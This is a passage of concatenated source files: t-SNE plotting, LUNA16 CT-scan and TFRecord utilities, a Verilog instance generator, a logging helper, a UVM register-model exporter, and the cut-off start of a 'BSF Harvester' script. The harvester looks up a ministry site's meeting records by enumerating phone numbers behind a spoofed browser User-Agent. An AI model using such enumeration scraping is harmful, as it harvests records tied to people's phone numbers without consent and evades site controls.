# Position of each label.
xtext, ytext = np.median(output_2d[target == i, :], axis=0)
txt = ax.text(xtext, ytext, str(i), fontsize=24)
txt.set_path_effects([pe.Stroke(linewidth=5, foreground="w"), pe.Normal()])
txts.append(txt)
ax.spines['bottom'].set_linewidth(font_board)
ax.spines['bottom'].set_color('black')
ax.spines['left'].set_linewidth(font_board)
ax.spines['left'].set_color('black')
ax.spines['top'].set_linewidth(font_board)
ax.spines['top'].set_color('black')
ax.spines['right'].set_linewidth(font_board)
ax.spines['right'].set_color('black')
ax.set_xticks([])
ax.set_yticks([])
plt.savefig(save_dir + '/{}_output_2d.svg'.format(save_dir), bbox_inches='tight')
else:
# 3D
if args.scratch:
output_3d = TSNE(perplexity=30, n_components=3).fit_transform(output)
np.save(save_dir + '/output_3d.npy', output_3d) #, allow_pickle=False)
else:
output_3d = np.load(save_dir + '/output_3d.npy')
target = target.reshape(target.shape[0])
output_3d_1 = output_3d[target==4, :]
output_3d_2 = output_3d[target==7, :]
output_3d = np.vstack((output_3d_1, output_3d_2))
target_1 = target[target==4]
target_2 = target[target==7]
target = np.vstack((np.expand_dims(target_1, axis=1), np.expand_dims(target_2, axis=1)))
target = target.reshape(target.shape[0])
print(output_3d.shape)
print(target.shape)
import matplotlib.pyplot as plt
import matplotlib.patheffects as pe
from mpl_toolkits.mplot3d import Axes3D
fig = plt.figure(figsize=(8,6))
ax = fig.add_subplot(111, projection='3d')
color = ['#440154', '#482878', '#3E4989', '#31688E', '#26828E', '#1F9E89', '#35B779', '#6ECE58', '#B5DE2B', '#FDE725']
def get_color(target):
_color = []
for i in range(target.shape[0]):
_color.append(color[target[i]])
return np.array(_color)
sc = ax.scatter(output_3d[:, 0], output_3d[:, 1], output_3d[:, 2], lw=0, s=10, c=get_color(target))
# ax.spines['bottom'].set_linewidth(font_board)
# ax.spines['bottom'].set_color('black')
# ax.spines['left'].set_linewidth(font_board)
# ax.spines['left'].set_color('black')
# ax.spines['top'].set_linewidth(font_board)
# ax.spines['top'].set_color('black')
# ax.spines['right'].set_linewidth(font_board)
# ax.spines['right'].set_color('black')
ax.set_xticklabels([])
ax.set_yticks([])
ax.set_zticklabels([])
# ax.set_zticks([])
# ax.grid()
# Add the labels for each digit.
txts = []
for i in range(10):
# Position of each label.
if output_3d[target == i, :].shape[0] > 10:
print(i)
xtext, ytext, ztext = np.median(output_3d[target == i, :], axis=0)
txt = ax.text(xtext, ytext, ztext, str(i), fontsize=24)
txt.set_path_effects([pe.Stroke(linewidth=5, foreground="w"), pe.Normal()])
txts.append(txt)
# ax.legend()
# plt.show()
plt.savefig(save_dir + '/{}_output_3d_4_7.svg'.format(save_dir), bbox_inches='tight')
``` |
{
"source": "JiabinTan/LUNA16",
"score": 3
} |
#### File: LUNA16/data_proc/reader_disp.py
```python
import SimpleITK as sitk
import numpy as np
#!/usr/bin/python2.6
# -*- coding: utf-8 -*-
import os
import matplotlib.pyplot as plt
from PIL import Image
import pandas as pd
import sys
'''When Python imports a module, it searches the paths in sys.path in order.
sys.path is a list that stores many paths as strings.
To use functions defined in another file, that file's directory must first be added to sys.path.
'''
sys.path.append('..//')
from Config.Config import Config as conf
'''
Read the image data.
Input:
    path to the image file
Output:
    image array, origin, spacing
'''
def load_image(filename):
image=sitk.ReadImage(filename)
numpy_image=sitk.GetArrayFromImage(image)
numpy_origin=np.array(list(reversed(image.GetOrigin())))
numpy_spacing=np.array(list(reversed(image.GetSpacing())))
return numpy_image,numpy_origin,numpy_spacing
'''
Read the candidate-region data.
Input: path to the candidates file
Output: a pandas object, so pandas operations can be applied directly
'''
def read_csv(filename):
lines=[]
lines=pd.read_csv(filename)
return lines
'''
Coordinate conversion.
Input: candidate world coordinate, origin, spacing
Output: the corresponding index into the image array
'''
def coord_convert(worldcood,origin,spacing):
stretched_voxel_coord=np.absolute(worldcood-origin)
voxel_coord=stretched_voxel_coord/spacing
return voxel_coord
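# Worked example (illustrative numbers only): with origin = [-100., -120., -130.]
# and spacing = [2.5, 0.7, 0.7] (z, y, x order, in mm), the world coordinate
# [-50., -85., -95.] maps to |[-50,-85,-95] - [-100,-120,-130]| / [2.5, 0.7, 0.7]
# = voxel index [20., 50., 50.].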
# Normalize the CT image to the range 0-1
def normalize_planes(ct_image):
    maxHU = 400  # HU of normal human tissue should be below this value
    minHU = -1000  # HU of air
normalized_image=(ct_image-minHU)/(maxHU-minHU)
normalized_image[normalized_image>1]=1
normalized_image[normalized_image<0]=0
return normalized_image
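# Example: an HU value of -300 normalizes to (-300 - (-1000)) / (400 - (-1000)) = 0.5;
# anything above 400 HU clips to 1 and anything below -1000 HU clips to 0.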
'''
For the 2D case: draw a box around the candidate position on the image.
Input: image data, y/x coordinates, box radius, box line thickness
Output: image data with the box drawn on it
'''
def draw_box(data,y,x,radius=30,pad=2):
data[max(0, y - radius):min(data.shape[0], y + radius),\
max(0, x - radius - pad):max(0, x - radius)] = 3000
data[max(0, y - radius):min(data.shape[0], y + radius),\
min(data.shape[1], x + radius):min(data.shape[1], x + radius + pad)] = 3000
data[max(0, y - radius - pad):max(0, y - radius),\
max(0, x - radius):min(data.shape[1], x + radius)] = 3000
data[min(data.shape[0], y + radius):min(data.shape[0], y + radius + pad),\
        max(0, x - radius):min(data.shape[1], x + radius)] = 3000  # horizontal line
return data
if __name__=='__main__':
#image_path=conf.CT_dir+'1.3.6.1.4.1.14519.5.2.1.6279.6001.105756658031515062000744821260.mhd'
#1.3.6.1.4.1.14519.5.2.1.6279.6001.108197895896446896160048741492
image_path=conf.CT_dir+'1.3.6.1.4.1.14519.5.2.1.6279.6001.108197895896446896160048741492.mhd'
csv_path=conf.scv_dir+'candidates.csv'
image,origin,spacing=load_image(image_path)
    # add a batch dimension to origin and spacing for the batch processing below
origin=origin[np.newaxis]
spacing=spacing[np.newaxis]
print("=======image info=====")
print('size:',image.shape)
print('origin:',origin)
print('spacing:',spacing)
candidates=read_csv(csv_path)
#print('====candidates samples====')
#for i in range(conf.batch_size+1):
# print(candidates[i])
# pass
start=15647
#9313
#16051
cand=candidates.loc[15645:15654]
cand=np.asarray(cand)
world_coord=np.asarray([cand[:,3],cand[:,2],cand[:,1]],dtype=float).T
print(world_coord)
print(coord_convert(world_coord,origin,spacing))
voxel_coord=np.rint(coord_convert(world_coord,origin,spacing)).astype(int)
for i in range(0,conf.batch_size):
#patch=image
plt.clf()
        image_no_cut = np.copy(image[voxel_coord[i][0]])  # copy to avoid mutating the original via a reference
plt.hist(image_no_cut.flatten(), bins=80, color='c')
plt.show()
new_image=draw_box(image_no_cut,voxel_coord[i][1],voxel_coord[i][2],radius=10,pad=2)
plt.title(str(cand[i][4]))
plt.imshow(new_image,cmap='gray')
plt.show()
#numpyImage, numpyOrigin, numpySpacing = load_image(image_path)
#print(numpyImage.shape)
#print(numpyOrigin)
#print(numpySpacing)
#cands = read_csv(csv_path)
    ## note: the candidate entries must correspond to the file being read
#for cand in cands[9315:9317]:
# worldCoord = np.asarray([float(cand[3]),float(cand[2]),float(cand[1])])
# voxelCoord = np.rint(coord_convert(worldCoord, numpyOrigin, numpySpacing)).astype(int)
# voxelWidth = 64
# patch = numpyImage[voxelCoord[0],voxelCoord[1]-32:voxelCoord[1]+32,voxelCoord[2]-32:voxelCoord[2]+32]
# patch = normalize_planes(patch)
# print(worldCoord)
# print(voxelCoord)
# print(patch)
# plt.imshow(patch, cmap='gray')
# plt.show()
```
#### File: LUNA16/data_proc/TFRecord_proc.py
```python
import tensorflow as tf
import numpy as np
'''
Read and write TFRecord files.
'''
class TFRecord(object):
'''
写入tfrecord数据
输入:
data数组,
label数组
dir保存路径
输出:
保存文件
'''
def writer(data,label,dir):
writer = tf.python_io.TFRecordWriter(dir)
for index,value in enumerate(data):
img_raw = value.tostring()
example = tf.train.Example(features=tf.train.Features(feature={
"label": tf.train.Feature(int64_list=tf.train.Int64List(value=[label[index]])),
'img_raw': tf.train.Feature(bytes_list=tf.train.BytesList(value=[img_raw]))
}))
            writer.write(example.SerializeToString())  # serialize to a string
pass
writer.close()
pass
    '''
    TFRecord reader.
    Input:
        tfrecords_filename: list of file names to read
        is_batch=False: whether to return batches; for testing, single-sample output is more
            convenient (note the difference in output dimensions between single and batched mode)
        is_shuffle=False: whether to shuffle; shuffle for training, but not for validation or test
        batch_size=32: batch size
        z_size=36: size along z
        y_size=48: size along y
        x_size=48: size along x
    '''
def reader(tfrecords_filename,is_batch=False,is_shuffle=False,batch_size=32,z_size=36,y_size=48,x_size=48):
filename_queue = tf.train.string_input_producer(tfrecords_filename)
reader = tf.TFRecordReader()
_, serialized_example = reader.read(filename_queue) #返回文件名和文件
features = tf.parse_single_example(serialized_example,
features={
'label': tf.FixedLenFeature([], tf.int64),
'img_raw' : tf.FixedLenFeature([], tf.string),
})
img = tf.decode_raw(features['img_raw'], tf.int16)
img = tf.reshape(img, [z_size, y_size, x_size])
label = tf.cast(features['label'], tf.int64)
if (is_batch):
if (is_shuffle):
img_batch, label_batch = tf.train.shuffle_batch([img, label],
num_threads=5,
batch_size=batch_size,
capacity=3000,
min_after_dequeue=1000)
else:
img_batch, label_batch = tf.train.batch([img,label],
batch_size=batch_size,
num_threads=5,
capacity=3000
)
pass
else:
return img,label
return img_batch, label_batch
pass
``` |
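A usage sketch for the class above, assuming the TF1-style queue-runner API and the module path `data_proc.TFRecord_proc` (both assumptions, not taken from the repo). The methods take no `self`, so they can be called directly on the class:
```python
import numpy as np
import tensorflow as tf
from data_proc.TFRecord_proc import TFRecord  # import path assumed

# Write ten fake candidate cubes (int16, matching the reader's decode_raw dtype).
patches = np.zeros((10, 36, 48, 48), dtype=np.int16)
labels = np.zeros(10, dtype=np.int64)
TFRecord.writer(patches, labels, 'train_000.tfrecord')

# Read one shuffled batch back through the TF1 input queue.
img_batch, label_batch = TFRecord.reader(['train_000.tfrecord'],
                                         is_batch=True, is_shuffle=True, batch_size=4)
with tf.Session() as sess:
    sess.run(tf.global_variables_initializer())
    coord = tf.train.Coordinator()
    threads = tf.train.start_queue_runners(sess=sess, coord=coord)
    imgs, lbls = sess.run([img_batch, label_batch])
    coord.request_stop()
    coord.join(threads)
```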
{
"source": "jiacaiyuan/uvm-generator",
"score": 3
} |
#### File: auto_instance/version_2/rtl_generator.py
```python
import re
import argparse
import os
class Rtl_generator:
def __init__(self):
self.extract_list=[]
self.info_list=[]
self.module_name = None
@staticmethod
def display_list_for_test(list_name):
print('list :\n')
for unit in list_name:
print(unit)
def get_module_specified_lines(self,regex,file_name):
print('input function: get_module_specified\n')
with open(file_name,'r') as file_obj:
add_flag = 0
for line in file_obj:
line = line.strip()
if not line.startswith('//'):
re_head_obj = re.match(regex,line)
re_tail_obj = re.match(r'endmodule',line)
if re_head_obj is not None:
add_flag = 1
elif add_flag == 1 and re_tail_obj is not None:
add_flag = 0
break
else:
continue
if add_flag == 1:
self.extract_list.append(line)
def extract_ports_info(self,regex_ports, regex_width):
print('input function: get_ports_info\n')
for unit in self.extract_list:
re_ports_obj = re.search(regex_ports,unit)
if re_ports_obj is not None:
port_name = re_ports_obj.group(6)
port_direction = re_ports_obj.group(1)
port_width_str = re_ports_obj.group(4)
if port_width_str is None:
port_width = 1
else:
#port_width = port_width_str
width_str = re.search(regex_width,port_width_str).group(2)
width_info_list = width_str.split(":")
high_str = width_info_list[0]
low_str = width_info_list[1]
if '-1' in high_str:
port_width = high_str.split("-")[0]
else:
high = int(high_str)
low = int(low_str)
port_width = high - low + 1 if high >= low else low - high + 1
port_info = {'name':port_name,'direct':port_direction,'width':port_width}
self.info_list.append(port_info)
def gen_module_instance(self,filename,mode):
print('input function: gen_module_instance')
ports_num = len(self.info_list)
line_list = []
line_list.append('module wrapper();')
if mode == 'gen_inst_wc':
for i in range(ports_num):
var_type = 'reg' if self.info_list[i]['direct'] == 'input' else 'wire'
line_list.append('{:<5} [{}-1:0] {};'.format(var_type,
self.info_list[i]['width'],
self.info_list[i]['name']))
line_list.append('\n')
line_list.append('{} inst_name'.format(self.module_name))
line_list.append('(')
index = 0
for unit in self.info_list:
if index == ports_num - 1:
post_fix = '//{:<15}width:{}'.format(unit['direct'], unit['width'])
else:
post_fix = ',//{:<15}width:{}'.format(unit['direct'], unit['width'])
index+=1
if mode == 'gen_inst_wc':
line_list.append('.{:<30}{:<30}{}'.format(unit['name'], '('+unit['name']+')', post_fix))
elif mode == 'gen_inst_only':
line_list.append('.{:<30}{:<5}{}'.format(unit['name'], '(' + ')', post_fix))
line_list.append(');')
line_list.append('endmodule\n')
for line in line_list:
print(line)
#with open(filename,'w') as file_obj:
# for line in line_list:
# file_obj.write(line)
# file_obj.write('\n')
#print('generate instance finish')
```
#### File: uvm-generator/generator/debug_log.py
```python
import sys
import logging
#setting the config about the log
def log_cfg(log_level=1, log_fil=""):  # the smaller the level, the more verbose the logging
    #DATE_FORMAT = "%m/%d/%Y %H:%M:%S %p"
    DATE_FORMAT = "%m/%d/%Y %H:%M:%S"  # the date format
    LOG_FORMAT="%(asctime)s\t%(levelname)s:%(message)s"  # the log message format
#LOG_FORMAT="%(asctime)s - %(levelname)s - %(filename)s[:%(lineno)d] - %(message)s"
if log_level==0:#level setting
log_level=logging.DEBUG
elif log_level==1:
log_level=logging.INFO
elif log_level==2:
log_level=logging.WARNING
elif log_level==3:
log_level=logging.ERROR
elif log_level==4:
log_level=logging.CRITICAL
else:#default
log_level=logging.INFO#default is info
if log_fil!="": #log into the file
formater=logging.Formatter(LOG_FORMAT)
logger=logging.getLogger()
logger.setLevel(log_level)
#standard out
stream_handler=logging.StreamHandler(sys.stdout)
stream_handler.setFormatter(formater)
#file out
file_handler=logging.FileHandler(log_fil)
file_handler.setFormatter(formater)
logger.addHandler(stream_handler)
logger.addHandler(file_handler)
#logging.basicConfig(filename=log_fil, level=log_level, format=LOG_FORMAT,datefmt=DATE_FORMAT)
#only has log but no stdout
else:#log into the std
logging.basicConfig(level=log_level, format=LOG_FORMAT,datefmt=DATE_FORMAT)
#--------------------------------------------------------
#Decorator demo
#--------------------------------------------------------
#def log(func):
# def wrapper(*args, **kw):
# print('call %s():' % func.__name__)
# return func(*args, **kw)
# return wrapper
#def log(text):
# def decorator(func):
# def wrapper(*args, **kw):
# print('%s %s():' % (text, func.__name__))
# return func(*args, **kw)
# return wrapper
# return decorator
#using the decorator for debug each function
def DEBUG(text=""):
def decorator(func):
def wrapper(*args, **kw):
if text!="":
logging.debug(str(" ")+func.__name__+str(": ")+str(text))
else:
logging.debug(str(" ")+func.__name__)
#logging.log(logging.DEBUG,string)
return func(*args, **kw)
return wrapper
return decorator
#def DEBUG(string):
# logging.debug(str(" ")+str(string))
# #logging.log(logging.DEBUG,string)
# return
#version 1
def INFO(string):#the info log
logging.info(str(" ")+string)
#logging.log(logging.INFO,string)
return
def WARNING(string):#the warning log
logging.warning(str(" ")+string)
#logging.log(logging.WARNING,string)
return
def ERROR(string):#the error log
logging.error(str(" ")+string)
#logging.log(logging.ERROR,string)
return
def CRITICAL(string):#the critical log
logging.critical(str(" ")+string)
#logging.log(logging.CRITICAL,string)
return
#version 2
#def INFO(string):#the info log
# print(str(" ")+string)
# return
#
#def WARNING(string):#the warning log
# print(str(" ")+string)
# return
#
#
#def ERROR(string):#the error log
# print(str(" ")+string)
# return
#
#
#def CRITICAL(string):#the critical log
# print(str(" ")+string)
# return
```
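A small usage sketch for the helpers above; the module name `debug_log` is assumed from the file path:
```python
from debug_log import log_cfg, DEBUG, INFO  # import path assumed

log_cfg(log_level=0, log_fil="run.log")  # level 0 = DEBUG; also mirror messages to run.log

@DEBUG("building the environment")
def build_env():
    INFO("build started")
    return 0

build_env()  # logs a DEBUG line naming the function, then the INFO line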
#### File: ralbot/uvmgen/exporter.py
```python
import os
from systemrdl.node import AddressableNode, RootNode
from systemrdl.node import AddrmapNode, MemNode
from systemrdl.node import RegNode, RegfileNode, FieldNode
from . import typemaps
#===============================================================================
class uvmGenExporter:
def __init__(self, **kwargs):
self.indent = kwargs.pop("indentLvl", " ")
self.uvmRegContent = list()
self.uvmMemContent = list()
self.uvmRegBlockContent = list()
self._max_width = None
# Check for stray kwargs
if kwargs:
raise TypeError("got an unexpected keyword argument '%s'" % list(kwargs.keys())[0])
self.filename = ""
self.dirname = "."
self.isSwReadable = True
self.isSwWriteable = True
self.isRclr = False
self.isRset = False
self.isWoset = False
self.isWoclr = False
#---------------------------------------------------------------------------
# def export(self, node, path):
# # Make sure output directory structure exists
# if os.path.dirname(path):
# os.makedirs(os.path.dirname(path), exist_ok=True)
# self.dirname = os.path.split(path)[0]
# filename = os.path.basename(path)
# filename = os.path.splitext(filename)[0]
# self.filename = filename + "_uvmreg.sv"
# filename = self.filename.upper().replace('.', '_')
# self.genDefineMacro(filename)
# print("dir="+str(self.dirname)+" filname="+str(self.filename))#jcyuan
#---------------------------------jcyuan comment
def export(self, node, path,filename):
# Make sure output directory structure exists
if not os.path.exists(path):
os.makedirs(path)
self.dirname=path
if(".sv" not in filename):
self.filename = filename+"_uvmreg.sv"
else:#has ".sv"
self.filename = filename
filename = self.filename.upper().replace('.', '_')
self.genDefineMacro(filename)
#--------------------------------------------jcyuan add
# If it is the root node, skip to top addrmap
if isinstance(node, RootNode):
node = node.top
if not isinstance(node, AddrmapNode):
raise TypeError("'node' argument expects type AddrmapNode. Got '%s'" % type(node).__name__)
# Determine if top-level node should be exploded across multiple
# addressBlock groups
explode = False
if isinstance(node, AddrmapNode):
addrblockable_children = 0
non_addrblockable_children = 0
for child in node.children():
if not isinstance(child, AddressableNode):
continue
if isinstance(child, (AddrmapNode, MemNode)) and not child.is_array:
addrblockable_children += 1
else:
non_addrblockable_children += 1
if (non_addrblockable_children == 0) and (addrblockable_children >= 1):
explode = True
# Do the export!
if explode:
# top-node becomes the memoryMap
# Top-node's children become their own addressBlocks
for child in node.children():
if not isinstance(child, AddressableNode):
continue
self.add_addressBlock(child)
else:
# Not exploding apart the top-level node
# Wrap it in a dummy memoryMap that bears it's name
# Export top-level node as a single addressBlock
self.add_addressBlock(node)
# Write out UVM RegModel file
self.uvmRegBlockContent.append("`endif")
with open(os.path.join(self.dirname, self.filename), "w") as f:
f.write('\n'.join(self.uvmRegContent + self.uvmMemContent + self.uvmRegBlockContent))
#---------------------------------------------------------------------------
def genDefineMacro(self, tag):
self.uvmRegContent.append("`ifndef __%s__" % tag)
self.uvmRegContent.append("`define __%s__" % tag)
#---------------------------------------------------------------------------
def add_uvm_block_content(self, indentLvl="", content=""):
self.uvmRegBlockContent.append(indentLvl + content)
#---------------------------------------------------------------------------
def add_uvm_reg_content(self, indentLvl="", content=""):
self.uvmRegContent.append(indentLvl + content)
#---------------------------------------------------------------------------
def add_uvm_mem_content(self, indentLvl="", content=""):
self.uvmMemContent.append(indentLvl + content)
#---------------------------------------------------------------------------
def add_addressBlock(self, node):
self._max_width = None
regNode = list()
regBlockNode = list()
memNode = list()
for child in node.children():
if isinstance(child, RegNode):
self.add_register(node, child)
regNode.append(child);
elif isinstance(child, (AddrmapNode, RegfileNode)):
self.add_registerFile(node, child)
regBlockNode.append(child)
elif isinstance(child, MemNode):
self.add_memFile(node, child)
memNode.append(child)
# Width should be known by now
# If mem, and width isn't known, check memwidth
if isinstance(node, MemNode) and (self._max_width is None):
self._max_width = node.get_property("memwidth")
allNodes = regNode + regBlockNode + memNode
self.add_uvm_block_content(content="class %s extends uvm_reg_block;" % node.inst_name)
self.add_variable_declare_func(node, allNodes)
self.add_uvm_block_content('''
`uvm_object_utils(%s)
function new(string name = "%s");
super.new(name, UVM_NO_COVERAGE);
endfunction ''' %(node.inst_name, node.inst_name))
self.add_build_func(node, allNodes)
#---------------------------------------------------------------------------
def add_registerFile(self, parent, node):
self._max_width = None
regNode = list()
regBlockNode = list()
memNode = list()
for child in node.children():
if isinstance(child, RegNode):
self.add_register(node, child)
regNode.append(child);
elif isinstance(child, (AddrmapNode, RegfileNode)):
self.add_registerFile(node, child)
regBlockNode.append(child)
elif isinstance(child, MemNode):
self.add_memFile(node, child)
memNode.append(child)
allNodes = regNode + regBlockNode + memNode
self.add_uvm_block_content(content="class %s extends uvm_reg_block;" % self.get_class_name(parent, node))
self.add_variable_declare_func(node, allNodes)
self.add_uvm_block_content('''
`uvm_object_utils(%s)
function new(string name = "%s");
super.new(name, UVM_NO_COVERAGE);
endfunction ''' %(self.get_class_name(parent, node), self.get_class_name(parent, node)))
self.add_build_func(node, allNodes)
#---------------------------------------------------------------------------
def add_register(self, parent, node):
if self._max_width is None:
self._max_width = max(node.get_property("accesswidth"), node.get_property("regwidth"))
else:
self._max_width = max(node.get_property("accesswidth"), node.get_property("regwidth"), self._max_width)
self.add_uvm_reg_content(content = "class %s extends uvm_reg;" % self.get_class_name(parent, node))
for field in node.fields():
self.add_uvm_reg_content(self.indent, "rand uvm_reg_field %s;" % field.inst_name);
self.add_uvm_reg_content(self.indent, "")
self.add_uvm_reg_content(self.indent, "virtual function void build();")
for field in node.fields():
isRand = "1" if field.is_sw_writable else "0"
isVolatile = "1" if field.is_volatile else "0"
self.setSwRdWrProperty(field)
self.add_uvm_reg_content(self.indent*2, "%s = uvm_reg_field::type_id::create(\"%s\", null, get_full_name());" % (field.inst_name, field.inst_name))
self.add_uvm_reg_content(self.indent*2, "%s.configure(this, %0d, %0d, \"%s\", %s, %s, %s, %s);" %(field.inst_name, field.width, field.low, self.getFieldAccessType(field), isVolatile, self.resetStr(field), isRand, self.isOnlyField(node)))
self.add_uvm_reg_content(self.indent, "endfunction")
self.add_uvm_reg_content('''
function new(string name = "%s");
super.new(name, %0d, UVM_NO_COVERAGE);
endfunction
`uvm_object_utils(%s)
endclass\n''' %(self.get_class_name(parent, node), node.get_property("regwidth"), self.get_class_name(parent, node)))
#---------------------------------------------------------------------------
# generate uvm reg model content function
#---------------------------------------------------------------------------
def add_variable_declare_func(self, parent, allNodes):
for child in allNodes:
if child.is_array:
for dim in child.array_dimensions:
self.add_uvm_block_content(self.indent, "rand %s %s[%0d];" %(self.get_class_name(parent, child), child.inst_name, dim));
else:
self.add_uvm_block_content(self.indent, "rand %s %s;" %(self.get_class_name(parent, child), child.inst_name));
def add_build_func(self, parentNode, allNodes):
self.add_uvm_block_content(self.indent, "")
self.add_uvm_block_content(self.indent, "virtual function void build();")
self.add_uvm_block_content(self.indent*2, "default_map = create_map(\"default_map\", `UVM_REG_ADDR_WIDTH'h0, %0d, UVM_LITTLE_ENDIAN, 1);" % (self._max_width/8))
for child in allNodes:
if isinstance(child, RegNode):
self.add_build_reg_content(parentNode, child)
elif isinstance(child, (AddrmapNode, RegfileNode)):
self.add_build_block_content(parentNode, child)
elif isinstance(child, MemNode):
self.add_build_mem_content(parentNode, child)
self.add_uvm_block_content(self.indent, "endfunction")
self.add_uvm_block_content(content="endclass\n")
def add_build_reg_content(self, parentNode, child):
if child.is_array:
self.add_uvm_block_content(self.indent*2, "foreach (this.%s[i]) begin" %child.inst_name)
self.add_uvm_block_content(self.indent*3, "%s[i] = %s::type_id::create($psprintf(\"%s[%%d]\",i));" % (child.inst_name, self.get_class_name(parentNode, child), child.inst_name))
self.add_uvm_block_content(self.indent*3, "%s[i].configure(this, null, \"%s[i]\");" % (child.inst_name, child.inst_name))
self.add_uvm_block_content(self.indent*3, "%s[i].build();" %(child.inst_name))
self.add_uvm_block_content(self.indent*3, "default_map.add_reg(%s[i], `UVM_REG_ADDR_WIDTH'h%x+i*`UVM_REG_ADDR_WIDTH'h%x, \"%s\", 0);" % (child.inst_name, child.raw_address_offset, child.array_stride, self.getRegAccessType(child)))
self.add_uvm_block_content(self.indent*2, "end")
else:
self.add_uvm_block_content(self.indent*2, "%s = %s::type_id::create(\"%s\");" % (child.inst_name, self.get_class_name(parentNode, child), child.inst_name))
self.add_uvm_block_content(self.indent*2, "%s.configure(this, null, \"%s\");" % (child.inst_name, child.inst_name))
self.add_uvm_block_content(self.indent*2, "%s.build();" %(child.inst_name))
self.add_uvm_block_content(self.indent*2, "default_map.add_reg(%s, `UVM_REG_ADDR_WIDTH'h%x, \"%s\", 0);" % (child.inst_name, child.address_offset, self.getRegAccessType(child)))
def add_build_block_content(self, parentNode, child):
if child.is_array:
self.add_uvm_block_content(self.indent*2, "foreach (this.%s[i]) begin" %child.inst_name)
self.add_uvm_block_content(self.indent*3, "%s[i] = %s::type_id::create($psprintf(\"%s[%%d]\",i), , get_full_name());" % (child.inst_name, self.get_class_name(parentNode, child), child.inst_name))
self.add_uvm_block_content(self.indent*3, "%s[i].configure(this, \"\");" % (child.inst_name))
self.add_uvm_block_content(self.indent*3, "%s[i].build();" %(child.inst_name))
self.add_uvm_block_content(self.indent*3, "default_map.add_submap(%s[i].default_map, `UVM_REG_ADDR_WIDTH'h%x+i*`UVM_REG_ADDR_WIDTH'h%x);" % (child.inst_name, child.raw_address_offset, child.array_stride))
self.add_uvm_block_content(self.indent*2, "end")
else:
self.add_uvm_block_content(self.indent*2, "%s = %s::type_id::create(\"%s\",,get_full_name());" %(child.inst_name, self.get_class_name(parentNode, child), child.inst_name))
self.add_uvm_block_content(self.indent*2, "%s.configure(this, \"\");" %(child.inst_name))
self.add_uvm_block_content(self.indent*2, "%s.build();" %(child.inst_name))
self.add_uvm_block_content(self.indent*2, "default_map.add_submap(%s.default_map, `UVM_REG_ADDR_WIDTH'h%x);" % (child.inst_name, child.address_offset))
def add_build_mem_content(self, parentNode, child):
self.add_uvm_block_content(self.indent*2, "%s = %s::type_id::create(\"%s\",,get_full_name());" % (child.inst_name, self.get_class_name(parentNode, child), child.inst_name))
self.add_uvm_block_content(self.indent*2, "%s.configure(this, \"%s\");" %(child.inst_name, child.inst_name))
self.add_uvm_block_content(self.indent*2, "default_map.add_mem(%s.default_map, `UVM_REG_ADDR_WIDTH'h%x, \"%s\");" % (child.inst_name, child.address_offset, typemaps.access_from_sw(child.get_property("sw"))))
def add_memFile(self, parent, node):
self.add_uvm_mem_content(content = "class %s extends uvm_reg;" % self.get_class_name(parent, node))
self.add_uvm_mem_content('''
function new(string name = \"%s\");
super.new(name, 'h%x, %0d, "%s", UVM_NO_COVERAGE);
endfunction
`uvm_object_utils(%s)
endclass\n''' % (self.get_class_name(parent, node), node.get_property("mementries"), node.get_property("memwidth"), typemaps.access_from_sw(node.get_property("sw")), self.get_class_name(parent, node)))
#---------------------------------------------------------------------------
# utilities function
#---------------------------------------------------------------------------
#---------------------------------------------------------------------------
def get_class_name(self, parent, node):
regBlockName = parent.inst_name
regName = node.inst_name
prefixString = "reg_"
if isinstance(node, RegNode):
prefixString = "reg_"
elif isinstance(node, (AddrmapNode, RegfileNode)):
prefixString = "block_"
elif isinstance(node, MemNode):
prefixString = "mem_"
return prefixString + regBlockName.lower() + "_" + regName.lower()
def resetStr(self, node):
reset = node.get_property("reset")
if reset is not None:
return "'h%x, " % reset + "1"
else:
return "0, 0"
    def isOnlyField(self, node):
        i = 0
        for field in node.fields():
            i += 1
        return "1" if (i == 1) else "0"
#set other sw read/write properties (these override sw= setting)
def setSwRdWrProperty(self, node):
self.isRclr = False
self.isRset = False
self.isWoclr = False
self.isWoset = False
if node.get_property("rclr"):
self.isSwReadable = True
self.isRclr = True
elif node.get_property("rset"):
self.isSwReadable = True
self.isRset = True
elif node.get_property("woclr"):
self.isSwWriteable = True
self.isWoclr = True
elif node.get_property("woset"):
self.isSwWriteable = True
self.isWoset = True
def getFieldAccessType(self, node):
accessMode = "RO"
if self.isRclr:
if self.isWoset:
accessMode = "W1SRC"
elif node.is_sw_writable:
accessMode = "WRC"
else:
accessMode = "RC"
elif self.isRset:
if self.isWoclr:
accessMode = "W1CRS"
elif node.is_sw_writable:
accessMode = "WRS"
else:
accessMode = "RS"
else:
if self.isWoclr:
accessMode = "W1C"
elif self.isWoset:
accessMode = "W1S"
elif node.is_sw_writable:
if node.is_sw_readable:
accessMode = "RW"
else:
accessMode = "WO"
return accessMode
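    # Quick reference for the mapping above (a summary, assuming standard UVM
    # access strings): rclr -> "RC"/"WRC" (or "W1SRC" together with woset),
    # rset -> "RS"/"WRS" (or "W1CRS" together with woclr), woclr -> "W1C",
    # woset -> "W1S"; plain sw-writable fields map to "RW"/"WO", all else "RO".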
def getRegAccessType(self, node):
accessMode = "RO"
if node.has_sw_writable:
if node.has_sw_readable:
accessMode = "RW"
else:
accessMode = "WO"
else:
accessMode = "RO"
return accessMode
``` |
{
"source": "jiachen247/BSF-Harvester",
"score": 2
} |
#### File: jiachen247/BSF-Harvester/app.py
```python
import os
import urllib2
import ssl
from datetime import datetime
import json
import time
DEFAULT_GET_DELAY_SECONDS = 2
FRIST_NUMBER = [8,9]
HTTP_URL_FORMAT = "https://www.bsfinternational.org/BSFAjaxUtils/Dispatch?action=AjaxGetClassMeetingInfo&searchByPhone=true&phoneNumber={}".format
PATH_DUMP = "./DUMP"
PATH_DUMP_BK_FORMAT ="./DUMP-{}.bak".format
FILE_DUMP_PATH_FORMAT = (PATH_DUMP + "/{}.{}.bsf").format
FILE_DUMP_HEADERS_FORMAT = ("===================================\n"
" Generated with BSF_HARVESTER\n"
" @nehcaij\n"
" {}\n\n"
" No: {}\n"
" Name: {}\n"
" Desc: {}\n"
" Church: {}\n"
" Address: {}\n"
" Day: {}\n"
" Time: {}\n"
"===================================\n\n").format
HTTP_HEADERS = {
"Host": "www.bsfinternational.org",
"User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0",
"Accept": "application/json, text/javascript, */*; q=0.01",
"Accept-Language": "en-US,en;q=0.5",
"Referer": "https://www.bsfinternational.org/lessons",
"X-Requested-With":"XMLHttpRequest"
}
def init():
print "Initializing BSF Harvester..."
def createNewDumpDir():
os.mkdir(PATH_DUMP)
def backupDumpDir():
timestamp = str(datetime.now())
